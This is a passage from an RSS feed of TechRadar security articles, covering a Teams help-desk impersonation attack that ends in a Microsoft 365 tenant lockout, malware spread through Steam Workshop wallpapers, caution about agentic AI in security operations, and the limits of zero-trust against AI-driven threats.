                                                                                                                    <dc:creator><![CDATA[ Andrea Sivieri ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/9WT9t3hZhDVD84bF8rSypL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A line of robots typing at computers]]></media:description>                                                            <media:text><![CDATA[A line of robots typing at computers]]></media:text>
                                <media:title type="plain"><![CDATA[A line of robots typing at computers]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9WT9t3hZhDVD84bF8rSypL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Microsoft recently warned that attackers are impersonating IT <a href="https://www.techradar.com/best/best-helpdesk-software">help desks</a> on Teams to gain access – and if that sounds bad, well, it’s just the opening move. </p><p>The attack begins when an employee gets a message from an external user claiming to be part of the company’s third-party IT support. A common-enough setup, and the kind of thing you might expect in a normal working day. </p><p>Perhaps the employee is expecting a similar message for an outstanding ticket – and so they engage with the user and, when prompted, grant remote access.</p><p>Once attackers have that foothold, they can proceed to execute a full tenant lockdown using only Microsoft's own legitimate features, without ever deploying traditional ransomware. It won’t look like <a href="https://www.techradar.com/best/best-malware-removal">malware</a>, and that means traditional defense systems won't catch it. </p><p>A real-time chat in a sanctioned <a href="https://www.techradar.com/best/best-online-collaboration-tools">collaboration tool</a>, with a plausible IT support pretext, is hard for busy employees to spot. For hackers, it’s a simple way to gain access to privileged and confidential data. </p><p>All they need is a few user-approved clicks and they have gained access to Quick Assist, registry persistence, lateral movement across the victim's environment and eventual data exfiltration over HTTPS. All without triggering suspicion.  </p><p>Data theft is just the opening move. Once attackers have privileged access through this kind of social engineering, the same foothold opens the door to full tenant ransom scenarios. Attackers can encrypt OneDrive and SharePoint content at scale, locking legitimate administrators out of the tenant by hijacking Global Admin accounts and conditional access policies. 
</p><p>They can hijack native M365 features like sensitivity labels to render data inaccessible.</p><h2 id="hoist-by-your-own-petard">Hoist by your own petard</h2><p>IT decision makers may believe they're covered against this kind of theft or lockout because they have <a href="https://www.techradar.com/best/best-ransomware-protection">ransomware</a> protection in place, but the reality is that many are more exposed than they know. </p><p>This attack class is effectively invisible to standard <a href="https://www.techradar.com/news/best-endpoint-security-software">endpoint protection software</a>, because the encryption that locks companies out of their critical data is performed by Microsoft's own features, not malicious code. </p><p>Hang on, you might say – in that case, isn’t this an easy fix? Don’t I just log in myself and un-encrypt the data? Sadly, the solution is anything but straightforward. Recovery from a full tenant takeover can take weeks and often requires direct Microsoft intervention. </p><p>During that period of time, critical business activities are likely to be disrupted or even halted completely, leading to potentially major financial and reputational losses.</p><p>Overall, the <a href="https://www.techradar.com/best/best-microsoft-teams-alternatives">Microsoft Teams</a> help desk impersonation attack works because it weaponizes the trust organizations put in systems like Microsoft 365. That level of often-blind trust puts organizations at risk, because native M365 controls were built for administration, not for resilience against real-time social engineering.</p><h2 id="building-360-protection-for-365">Building 360 protection for 365</h2><p>Clearly, the risk posed by this kind of social engineering attack is significant. It highlights the fact that Microsoft 365 has become critical infrastructure that demands a dedicated operational control plane, not just admin tooling. 
Businesses cannot simply plug, play, and walk away, hoping the system will protect itself. They need to have a deep level of insight into what’s going on across their tenant, who has access, and whether anything unusual or suspicious is taking place.</p><p>As a result, visibility into privileged role assignments, configuration drift, and admin activity in real time is no longer optional. It's the difference between a contained incident and a business-stopping event. </p><p>Organizations need an operating layer that provides that continuous visibility across thousands of configuration attributes and follows a least-privilege administration protocol. Spotting configuration drift, privilege changes, and anomalous activity is only possible when you know what 'normal' looks like, and that requires years of telemetry across complex, real-world tenants. </p><p>This approach can help build in tenant resilience within the Microsoft 365 environment, reducing the damage that a single human slip can cause, and ringfencing malicious access quickly after a breach.</p><p>Another key consideration is the introduction of next-gen technology to improve defensive intelligence, speed, and granularity. An AI-enabled operating layer can surface anomalous configuration drift and privilege changes the moment they happen, not days later in a log review. </p><p>By drawing on proprietary tenant context - permissions, role assignments, configuration history, and behavioral baselines built from millions of real-world events - AI can surface malicious activity that generic tooling would miss entirely. </p><p>In cases like these, a rapid response is crucial. 
The quicker controllers are alerted to the danger, and the quicker entry is revoked for the suspicious user, the lower the chance of either a data breach or a lockout.</p><p>At root, the Teams attack exploits the oldest <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a> risk in the book: human error. No organization's staff are error-proof, which means additional defensive help is required to preserve the integrity of critical M365 tenants. </p><p>In reality, the addition of a powerful, intelligent control layer is the only way businesses can prevent a single approved remote session from escalating into domain-wide compromise.</p><p><a href="https://www.techradar.com/pro/best-active-directory-documentation-tool-of-year"><em>We feature the best Active Directory documentation tools</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Gamers beware — experts flag Steam Workshop is being abused to spread malware via Wallpaper Engine app ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/gamers-beware-experts-flag-steam-workshop-is-being-abused-to-spread-malware-via-wallpaper-engine-app</link>
                                                                            <description>
                            <![CDATA[ Even a wallpaper can carry a virus these days, so be careful what you're downloading. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">B3V2m3Yxk6tVMC8s5Vf7DG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/ijYNM9nFwBzeyTVPTzBdBj-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 17 Jun 2026 17:15:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/ijYNM9nFwBzeyTVPTzBdBj-1280-80.jpg">
                                                            <media:credit><![CDATA[Wallpaper Engine]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Wallpaper Engine app, available on Steam.]]></media:description>                                                            <media:text><![CDATA[Wallpaper Engine app, available on Steam.]]></media:text>
                                <media:title type="plain"><![CDATA[Wallpaper Engine app, available on Steam.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ijYNM9nFwBzeyTVPTzBdBj-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Kaspersky found Steam Workshop wallpapers weaponized to deliver malware via Wallpaper Engine</strong></li><li><strong>Dozens of malicious “application wallpapers” downloaded tens of thousands of times, spreading backdoors, infostealers, miners, and ransomware</strong></li><li><strong>Valve removed the infected uploads, but users warned attackers could easily re‑upload new ones</strong></li></ul><p>Steam Workshop, a community platform built into Steam that allows users to share custom content, was being used to infect gamers with malware, researchers have claimed.</p><p>For at least half a year, gamers who used the platform to download certain wallpapers were being served various malware, Kaspersky recently explained.</p><p>This campaign has been running since at least late 2025, Kaspersky said - with some sources noting the majority of the victims are in <a href="https://cyberinsider.com/steam-workshop-hosts-wallpapers-with-account-stealing-malware/" target="_blank">Russia and China</a>.</p><h2 id="dozens-of-malicious-wallpapers">Dozens of malicious wallpapers</h2><p>Steam is a hugely popular digital distribution platform for PC games, developed by a company called Valve. Baked into it is Workshop, a community tool where gamers can share mods, maps, skins, wallpapers, and other add-ons for games and applications.</p><p>Among other things, Steam Workshop allows gamers to use Wallpaper Engine, a desktop customization application that supports more than just “static” image wallpapers. 
With it, gamers can have videos, interactive animations, and even entire applications, displayed as a wallpaper.</p><p>And that is where the problem lies - hackers have been using application wallpapers as delivery mechanisms for different <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a>, including backdoors and cryptojackers.</p><p>"We discovered dozens of these malicious application wallpapers floating around Steam Workshop, and each one had already been downloaded thousands – or even tens of thousands – of times," Kaspersky said.</p><p>Looking deeper into the weaponized wallpapers, Kaspersky found that the malware is often either bundled in the package, or delivered inside a password-protected archive. The payload itself is executed automatically the moment the user installs the wallpaper, Kaspersky said. In one example, Kaspersky was served a backdoor, and in another, an infostealer. Lumma and Vidar infostealers, cryptocurrency miners, botnet loaders, RanEngine, and even ransomware strains were all being distributed this way. </p><p>Kaspersky disclosed its findings only after Steam identified and removed all of the malicious wallpaper applications. However, users should approach with caution, because there’s nothing stopping the threat actors from simply uploading new ones.</p><p><em>Via </em><a href="https://www.bleepingcomputer.com/news/security/steam-workshop-abused-to-spread-malware-via-wallpaper-engine-app/" target="_blank"><em>BleepingComputer</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Why security leaders are cautious about agentic AI ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/why-security-leaders-are-cautious-about-agentic-ai</link>
                                                                            <description>
                            <![CDATA[ Agentic AI can improve security operations, but only with strong oversight and real context. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">6PsQPF8bBKTztASxR92V6W</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 17 Jun 2026 10:58:04 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Howie Koh ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg">
                                                            <media:credit><![CDATA[Thapana Onphalai via Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:description>                                                            <media:text><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:text>
                                <media:title type="plain"><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Agentic AI is everywhere in <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a> right now, but it often feels like everyone is using the term slightly differently. </p><p>Vendors are quick to mention it, yet rarely stop to explain what it actually means in practice or what problem it’s meant to solve. </p><p>For security leaders, that makes it a difficult space to navigate, especially when expectations are high but clarity is still catching up.</p><p>At its core, agentic AI describes a goal-oriented system of multiple agents that can act, sometimes autonomously, towards an outcome. That is a concept, not a cybersecurity result. </p><p>In software development, the value is more straightforward. Multiple agents can collaborate to write, test, and improve code. In cybersecurity, the environment is far more fragmented. </p><p>Tools span <a href="https://www.techradar.com/news/best-endpoint-security-software">endpoint</a>, network, identity, cloud, vulnerability management, and response. If agentic AI is limited to a single vendor’s ecosystem, it cannot deliver meaningful outcomes. It simply operates within another silo.</p><h2 id="the-challenge-of-fragmented-security-environments">The Challenge of Fragmented Security Environments</h2><p>The cybersecurity industry has long talked about platformization, but in practice many platforms have become larger collections of disconnected capabilities. This is where many early implementations fall short. </p><p>Instead of transforming workflows, they provide a chat interface that allows operators to query multiple systems. While this may improve usability, it actually increases cognitive load. 
</p><p><a href="https://www.techradar.com/news/best-internet-security-suites">Security</a> teams need to know what the platform is capable of, ask the right questions, interpret results, correlate findings, and decide on actions.</p><h2 id="why-caution-is-justified">Why Caution Is Justified</h2><p>Security leaders are right to approach agentic AI carefully. The market is full of bold claims about autonomous systems that can solve complex problems without human input. In reality, most of these systems are far from that level of capability. </p><p>Without expert-level instruction, agentic systems cannot operate autonomously in a reliable way. Many current solutions depend on users crafting prompts and interpreting outputs. </p><p>Transparency is another concern. If a vendor cannot clearly explain how their system works, what data it uses, and where human oversight applies, it is difficult to trust the outcomes. In security operations, where decisions can have direct business impact, that lack of clarity is unacceptable.</p><h2 id="the-role-of-guardrails-and-human-oversight">The Role of Guardrails and Human Oversight</h2><p>Effective agentic AI in cybersecurity must include strong guardrails and human-in-the-loop control. Security teams can use AI to accelerate investigation, analysis, and prioritization, but final decisions must remain with people.</p><p>Actions need to be explainable, traceable, and auditable. Security leaders must be able to understand why a recommendation was made and what evidence supports it. Without that, trust quickly breaks down.</p><p>The goal is not to remove humans from the process, but to give them better information faster and reduce the number of manual steps required to reach a decision.</p><h2 id="planning-past-the-hype-cycle">Planning Past the Hype Cycle</h2><p>The industry is already moving beyond early experimentation. Agentic workflows are beginning to reshape how security operations function. 
In some cases, they will reduce the need for traditional orchestration approaches as <a href="https://www.techradar.com/best/best-bi-tools">intelligence</a> becomes embedded directly in investigation and response.</p><p>At the same time, new models, like Mythos, are emerging that can assess vulnerabilities and provide deeper insight into risk. These developments will challenge tools that rely heavily on static analysis or periodic assessments.</p><p>Mythos has transformed the vulnerability detection space and we’re starting to see disruptive volumes of findings. But, what happens 12 months from now after the number of findings plateaus? How will your agentic tools detect misconfiguration or poor posture and take remediation action for those vulnerabilities that did not get patched? </p><p>That’s where the real test begins. Agentic AI offering lasting value should move beyond discovering issues to continuously identifying root causes, detecting drift in posture or configuration, and guiding remediation over time.</p><h2 id="what-good-looks-like-in-practice">What Good Looks Like in Practice</h2><p>When implemented correctly, agentic AI can deliver meaningful benefits. Consider a <a href="https://www.techradar.com/best/best-ransomware-protection">ransomware</a> incident. Instead of requiring an analyst to manually investigate across multiple tools, an agentic system could connect events across endpoint, network, and identity data.</p><p>It could identify that <a href="https://www.techradar.com/best/best-malware-removal">malware</a> execution is linked to a disabled protection control, trace lateral movement attempts, and highlight indicators of compromise. All of this information can be presented as a clear, evidence-based narrative.</p><p>Rather than sorting through alerts, the analyst is given a concise understanding of what happened, why it matters, and what actions can be taken. 
This might include isolating affected systems or restricting access to contain the threat.</p><h2 id="reducing-noise-and-improving-decision-making">Reducing Noise and Improving Decision Making</h2><p>One of the biggest challenges in security operations is the volume of alerts. Agentic AI has the potential to improve the signal-to-noise ratio by correlating data and focusing attention on what truly matters.</p><p>By combining evidence from multiple sources, it can escalate only the most critical issues and provide clear reasoning behind those decisions. This allows teams to respond more quickly and with greater confidence.</p><p>Today, many investigations take hours or even days. By automating key steps, agentic AI can reduce that time significantly, helping teams keep pace with fast-moving threats while reducing burnout.</p><h2 id="what-to-prioritize">What to Prioritize</h2><p>Security leaders need to separate <a href="https://www.techradar.com/best/best-online-marketing-services">marketing</a> claims from real capability. Many vendors promote AI, but few are using it to fundamentally improve how security work is done. The focus should be on solutions that reduce detection and response time and improve operational efficiency.</p><p>Strong solutions are grounded in real data. They rely on tools that directly observe activity across endpoint, network, identity, and cloud environments. This data provides the foundation for accurate analysis and decision making.</p><p>Equally important is the ability to take action. Systems that only generate alerts or tickets add friction. The most valuable platforms enable teams to act within the same workflow, whether that means isolating devices, enforcing policies, or guiding response actions.</p><h2 id="a-practical-path-forward">A Practical Path Forward</h2><p>Not all consolidation is beneficial. 
Security teams should avoid solutions that add noise without improving clarity.</p><p>They should also be cautious of systems that rely heavily on open-ended prompts. These interfaces often shift the burden onto the user, forcing them to determine what questions to ask and whether the system can answer them.</p><p>Security leaders should avoid AI that produces unreliable or unsupported outputs. Effective agentic AI must be grounded in repeatable workflows and supported by verifiable evidence.</p><p>Agentic AI has the potential to improve cybersecurity operations, but only when it is applied thoughtfully. The goal is not full automation, but meaningful augmentation of human expertise.</p><p>CISOs should adopt a measured approach. Invest in solutions that provide clear value today, maintain governance and oversight, and build toward greater capability over time. By focusing on outcomes rather than hype, security leaders can take advantage of agentic AI without introducing unnecessary risk.</p><p>Success will come from using AI to make security teams faster, more informed, and more effective while keeping humans firmly in control of decisions that matter most.</p><p><a href="https://www.techradar.com/best/best-identity-management-software"><em>We rank the best identity management software</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ How can businesses respond to the next generation of AI? ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/how-can-businesses-respond-to-the-next-generation-of-ai</link>
                                                                            <description>
                            <![CDATA[ As AI lowers the barrier of entry for cybercriminals, the baseline for defense must rise too. Anthropic AI’s Mythos model is a wake-up call. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">oBx4EhWdCXxB5edqsUjUvE</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/mfPaYGQmks2VALWFFBnSej-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 17 Jun 2026 07:14:25 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sujatha S Iyer ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/mfPaYGQmks2VALWFFBnSej-1280-80.jpg">
                                                            <media:credit><![CDATA[Blue Planet Studio/Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A robot hand touching a locked digital shield blocking a human from accessing data]]></media:description>                                                            <media:text><![CDATA[A robot hand touching a locked digital shield blocking a human from accessing data]]></media:text>
                                <media:title type="plain"><![CDATA[A robot hand touching a locked digital shield blocking a human from accessing data]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/mfPaYGQmks2VALWFFBnSej-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>As AI models continue to evolve, including newer systems such as Claude Mythos, conversations around their impact on cybersecurity are becoming more common.</p><p>While headlines can sometimes overstate the risks, the broader reality is that increasingly capable <a href="https://www.techradar.com/best/best-ai-tools">AI tools</a> may also make cyberattacks more sophisticated and accessible.</p><p>For UK businesses, this is a reminder that cyber resilience isn’t just an AI issue.</p><p>It’s a priority that requires board-level attention.</p><p>As AI lowers the barrier of entry for cybercriminals, the baseline for defense must rise too.</p><h2 id="ai-s-impact-on-cybercrime">AI’s impact on cybercrime</h2><p>AI has turbocharged the arsenal of cyber-attackers. For instance, sophisticated tools can enable fraudsters to launch large-scale identity attacks via methods such as deepfake images, document spoofing, and synthetic identities.</p><p>These technologies are all scalable and automated, which means the time to compromise has shrunk from days to minutes. Hacks are often happening faster than organizations can respond. And increasing accessibility of the technology means it can be weaponized by anyone.</p><p>It is important to stress that while this paints a bleak picture, the same technology can be leveraged by organizations to detect anomalies and strengthen <a href="https://www.techradar.com/best/best-identity-management-software">identity management</a>. But as these technologies continue to evolve, organizations can no longer rely on traditional fraud detection methods.</p><h2 id="the-shift-from-reactive-to-pre-emptive">The shift from reactive to pre-emptive</h2><p>Many organizations are still following yesterday’s security methods to deal with today’s threats. 
A reactive <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> approach is no longer enough in an era where AI-driven attacks are accelerating and expanding the attack surface.</p><p>That doesn’t mean businesses shouldn’t have a recovery strategy: having a plan in place to detect attacks and respond to incidents is still key. But prevention and prediction are now the name of the game.</p><p>Businesses should focus on building an approach that shifts the focus of security teams from detection and response to prevention. This includes using technology such as AI to anticipate threats and to validate security controls. This prevents attackers from exploiting vulnerabilities and enables continuous testing and verification of methods.</p><p>Traditional perimeter-based approaches are no longer sufficient when threats are becoming more adaptive and intelligent. Instead, organizations need to prioritize continuous <a href="https://www.techradar.com/best/best-network-monitoring-tools">network monitoring</a>, identity-first security, and rapid incident response capabilities that can keep pace with AI-driven threats.</p><p>Failure to do so means that businesses risk major security incidents, financial losses, and competitive disadvantage.</p><h2 id="strengthening-cyber-hygiene-at-every-level">Strengthening cyber hygiene at every level</h2><p>The cyber resilience of businesses also depends on strengthening cyber hygiene at every level. Even the most advanced tools can be undermined by poor <a href="https://www.techradar.com/best/best-patch-management-tools">patch management</a> or a lack of employee awareness.</p><p>Training and development are crucial for employees to acquire the necessary skills to utilize AI effectively and explore new opportunities. Businesses should also focus on continually educating their employees on the secure usage of generative AI systems.
</p><p>This should be alongside <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity </a>training – such as helping employees at all levels to identify the tell-tale signs of AI-driven attacks. Implementing strong password policies is also crucial.</p><p>It’s also critical to focus on periodic patching of endpoints. The first stage of <a href="https://www.techradar.com/best/best-malware-removal">malware</a>, <a href="https://www.techradar.com/best/best-ransomware-protection">ransomware</a>, and phishing-based attacks often happens on an endpoint. Here, AI is a friend rather than a foe: AI-driven security decisions, continuous risk assessment, and platform-level integration help to protect endpoints.</p><h2 id="the-key-takeaway">The key takeaway</h2><p>New cybersecurity risks, the growing influence of AI, and the expectations of clients and regulators all mean that UK businesses need to supercharge their cyber approach. Not only can a comprehensive and effective recovery plan help businesses bounce back with minimal impact – it’s also cheaper than paying the price of a breach.</p><p>Looking to the future, the evolution of AI – including ever-improving agents – will pose new threats to businesses. Organizations should rethink their approaches, with a traditional response-driven strategy no longer sufficient when threats are becoming more adaptive and intelligent. Instead, a preemptive security model can enable them to keep pace with AI-driven threats.</p><p>It’s also worth remembering that AI can play a role in protecting businesses. Mozilla tested Mythos on its Firefox browser and found 271 flaws. It was able to fix them. It’s encouraging that these flaws were ones that could have been found by a human researcher – and that the AI was able to discover them quickly and at scale. 
</p><p>While these AI tools should encourage organizations to rethink their assumptions about threat actors, their powers can also be used for good.</p><p><a href="https://www.techradar.com/best/best-antivirus"><em>We've reviewed and rated the best antivirus software</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing, find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ In the age of AI-based threats, zero-trust is no longer enough ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/in-the-age-of-ai-based-threats-zero-trust-is-no-longer-enough</link>
                                                                            <description>
                            <![CDATA[ The emergence of AI-based threats means zero-trust is no longer strong enough to tackle these alone. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">ndXZWkWw5QiWNAUqJEmtKc</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/JpXukHGqkZ8gapEzDQNqRW-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 16 Jun 2026 14:21:15 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Dr. Lyron Andrews ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/JpXukHGqkZ8gapEzDQNqRW-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock / ZinetroN]]></media:credit>
                                                                                                                                                                        <media:description><![CDATA[New DDoS record]]></media:description>                                                            <media:text><![CDATA[Concept art representing cybersecurity principles]]></media:text>
                                <media:title type="plain"><![CDATA[Concept art representing cybersecurity principles]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/JpXukHGqkZ8gapEzDQNqRW-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>As AI-based threats continue to dominate the conversation around security, it’s no surprise that half (50%) of organizations are on track to adopt zero-trust data governance by 2028. In the past few years, zero-trust has become the cornerstone of modern <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a> strategy – but the emergence of AI means it’s no longer strong enough to tackle rapidly developing AI-based threats alone.</p><p>As AI threats continue to rise, CISOs are challenging the misconception that zero-trust architecture (ZTA) is a one-size-fits-all solution that gives organizations peace of mind and means they don’t need to worry about security. Instead, they are focused on maximizing ZTA’s capabilities while also recognizing its shortcomings and where additional forms of security are necessary.</p><p>Some professionals argue that <a href="https://www.techradar.com/best/ztna-solutions">zero trust</a> is nothing more than OAuth, but in reality ZTA is far more comprehensive: it is a strategic framework, not just a protocol. With deepfake fraud attempts rising 94% year-on-year and attack surfaces expanding, ZTA is more important than ever, but AI-backed attacks growing by almost 100% in 2025 mean that other forms of security are also necessary.</p><p>ZTA can strengthen cybersecurity by continuously assessing access, but it cannot fully prevent insider attacks, software vulnerabilities or physical security breaches. 
As AI learning models advance in their ability to enter systems unnoticed, a variety of security protocols is needed to counter them.</p><h2 id="why-the-protection-doesn-t-change-regardless-of-the-threat">Why the protection doesn’t change, regardless of the threat</h2><p>Traditional cybersecurity models, including ZTA, were designed around predictable human behavior and manually executed attacks, but the rise of AI-powered systems means that the speed and scale of attacks have changed significantly.</p><p>ZTA-based security systems were built and implemented at a time when the biggest threat to security was human threat actors entering systems to download <a href="https://www.techradar.com/best/best-malware-removal">malware</a> onto them. This is time-consuming and very manual, with threat actors trying lists of passwords to enter systems or sending phishing emails. AI-driven autonomous systems can operate independently, so while the core principles of security remain unchanged, the methods used to implement them must evolve to address the threats these systems face.</p><p><a href="https://www.techradar.com/news/best-internet-security-suites">Internet security</a> systems still depend on protecting attack surfaces, which are consistently expanding due to the introduction of new pathways for autonomous decision-making and machine-to-machine interaction. AI systems require more connectivity compared with manual ones, creating more opportunities for agents to exploit vulnerabilities both intentionally and accidentally.</p><p>Natural <a href="https://www.techradar.com/best/best-language-learning-apps">language</a> itself is also an attack surface, with AI systems accepting ambiguous instructions without questioning their context or intention. 
This means attackers can manipulate systems through emails, messages and hidden text, creating new attack surfaces and making AI agents far more vulnerable to attacks than traditional systems, which require detailed code input by a skilled developer to operate.</p><p>Human-in-the-loop controls are crucial against natural-language-based attacks, since the systems themselves cannot distinguish between suspicious and legitimate prompts. Maintaining human controls over security measures, even those that are largely automated, ensures that attacks which use natural language or hidden context can be identified.</p><h2 id="a-measurable-approach-to-security-minimizes-blast-radius">A measurable approach to security minimizes blast radius</h2><p>ZTA minimizes an attacker’s ‘blast radius’ by assuming that no user or device should be inherently trusted, even once initial access has been granted. It prevents threat actors from moving across systems, meaning that should a compromise happen, the attacker will struggle to reach sensitive systems or escalate privileges without permission.</p><p>AI accelerates attack attempts, scanning environments continuously and testing permissions automatically. It can adapt strategies in real time, changing methods of attack and discovering system weaknesses much faster than humans can through manual searches. 
AI attacks increasingly exploit layers including workflows and agent-to-agent interactions, changing the fundamentals of what is required of ZTA systems.</p><p>As a result, ZTA systems must evolve beyond static identity and <a href="https://www.techradar.com/news/best-access-control-systems">access controls</a> to continuously monitor interactions between autonomous agents, responding dynamically to abnormal activity in real time and shifting zero-trust from a user-focused model to one capable of governing machine-to-machine ecosystems.</p><p>By using quantifiable data and continuous evaluation, cybersecurity teams can determine whether newly implemented controls are effective, turning security systems into an evidence-based process.</p><h2 id="misconceptions-around-zta-can-lead-to-heightened-security-threats">Misconceptions around ZTA can lead to heightened security threats</h2><p>Many experts believe that ZTA means AI can be deployed safely without additional security controls. ZTA reduces certain categories of risk but does not guarantee total safety once AI has entered a system, or has been built into internal workflows.</p><p>Zero-trust was built around human identity, and focuses on verifying who a user is, whether they are acting unusually and if their device is compliant. But AI-based threats can enter systems successfully using false biometrics or by guessing passwords, or may have been given access to a system previously to automate tasks.</p><p>An authorized AI agent can leak sensitive data or misuse the tools it already has access to without ever alerting ZTA that something is wrong. 
In order to use ZTA effectively, cybersecurity professionals must avoid overconfidence in its ability to ensure that AI systems behave safely or truthfully once access is granted.</p><h2 id="diversifying-security-defenses-against-ai-driven-threats">Diversifying security defenses against AI-driven threats</h2><p>Alongside ZTA, organizations must also implement additional tools to protect against attacks – systems that ensure AI is not left unsupervised to make its own decisions without oversight. AI systems continuously evolve, with models updating regularly, meaning organizations need strict governance processes and safety benchmarking to become a permanent part of security, not just occasional checks every few weeks or months.</p><p>As threats continue to diversify and evolve, security needs to do the same, and one-size-fits-all systems are quickly becoming a thing of the past. For CISOs, a multi-pronged approach can keep their organizations safe and prevent various different types of attacks. Combining approaches including ZTA, threat intelligence and human-in-the-loop oversight can create overlapping layers of protection that reduce single points of failure.</p><p>Mature ZTA implementations make access decisions dynamically using contextual factors, allowing systems to continuously evaluate risk and limit lateral movement even if credentials are compromised. 
